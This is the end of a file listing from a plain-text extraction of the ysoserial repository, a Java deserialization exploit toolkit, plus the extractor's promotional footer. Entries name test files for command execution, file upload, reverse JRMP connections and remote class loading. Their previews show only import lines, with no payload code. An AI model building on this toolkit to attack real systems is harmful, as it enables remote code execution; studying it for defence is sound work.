"path": "src/test/java/ysoserial/test/payloads/CommandExecTest.java",
"chars": 1202,
"preview": "package ysoserial.test.payloads;\n\nimport org.junit.Assert;\nimport ysoserial.test.CustomTest;\nimport ysoserial.test.util."
},
{
"path": "src/test/java/ysoserial/test/payloads/FileUploadTest.java",
"chars": 2384,
"preview": "package ysoserial.test.payloads;\n\nimport java.io.File;\nimport java.io.IOException;\nimport java.util.Arrays;\nimport java."
},
{
"path": "src/test/java/ysoserial/test/payloads/JRMPReverseConnectSMTest.java",
"chars": 1498,
"preview": "package ysoserial.test.payloads;\n\n\nimport java.net.URL;\nimport java.util.concurrent.Callable;\n\nimport ysoserial.test.Wra"
},
{
"path": "src/test/java/ysoserial/test/payloads/JRMPReverseConnectTest.java",
"chars": 1154,
"preview": "package ysoserial.test.payloads;\n\n\nimport java.util.concurrent.Callable;\n\nimport javax.management.BadAttributeValueExpEx"
},
{
"path": "src/test/java/ysoserial/test/payloads/MyfacesTest.java",
"chars": 5824,
"preview": "package ysoserial.test.payloads;\n\n\nimport java.beans.FeatureDescriptor;\nimport java.net.MalformedURLException;\nimport ja"
},
{
"path": "src/test/java/ysoserial/test/payloads/PayloadsTest.java",
"chars": 13285,
"preview": "package ysoserial.test.payloads;\n\n\nimport java.io.ByteArrayOutputStream;\nimport java.io.File;\nimport java.io.OutputStrea"
},
{
"path": "src/test/java/ysoserial/test/payloads/RemoteClassLoadingTest.java",
"chars": 3518,
"preview": "package ysoserial.test.payloads;\n\n\nimport java.io.ByteArrayInputStream;\nimport java.io.IOException;\nimport java.io.Seria"
},
{
"path": "src/test/java/ysoserial/test/payloads/TestHarnessTest.java",
"chars": 2030,
"preview": "package ysoserial.test.payloads;\n\nimport java.io.IOException;\nimport java.io.ObjectInputStream;\nimport java.io.Serializa"
},
{
"path": "src/test/java/ysoserial/test/util/Callables.java",
"chars": 926,
"preview": "package ysoserial.test.util;\n\nimport java.util.concurrent.Callable;\n\npublic class Callables {\n public static interfac"
},
{
"path": "src/test/java/ysoserial/test/util/Files.java",
"chars": 349,
"preview": "package ysoserial.test.util;\n\nimport java.io.File;\n\npublic class Files {\n public static void waitForFile(File file, i"
},
{
"path": "src/test/java/ysoserial/test/util/GadgetsTest.java",
"chars": 427,
"preview": "package ysoserial.test.util;\n\nimport org.junit.Test;\nimport ysoserial.payloads.util.Gadgets;\n\npublic class GadgetsTest {"
},
{
"path": "src/test/java/ysoserial/test/util/OS.java",
"chars": 689,
"preview": "package ysoserial.test.util;\n\npublic enum OS {\n WINDOWS,\n LINUX,\n OSX,\n OTHER;\n\n private static final OS "
},
{
"path": "src/test/java/ysoserial/test/util/Throwables.java",
"chars": 234,
"preview": "package ysoserial.test.util;\n\npublic class Throwables {\n\tpublic static Throwable getInnermostCause(final Throwable t) {\n"
}
]
About this extraction
This page contains the full source code of the frohoff/ysoserial GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 91 files (255.9 KB), approximately 61.2k tokens, and a symbol index with 458 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.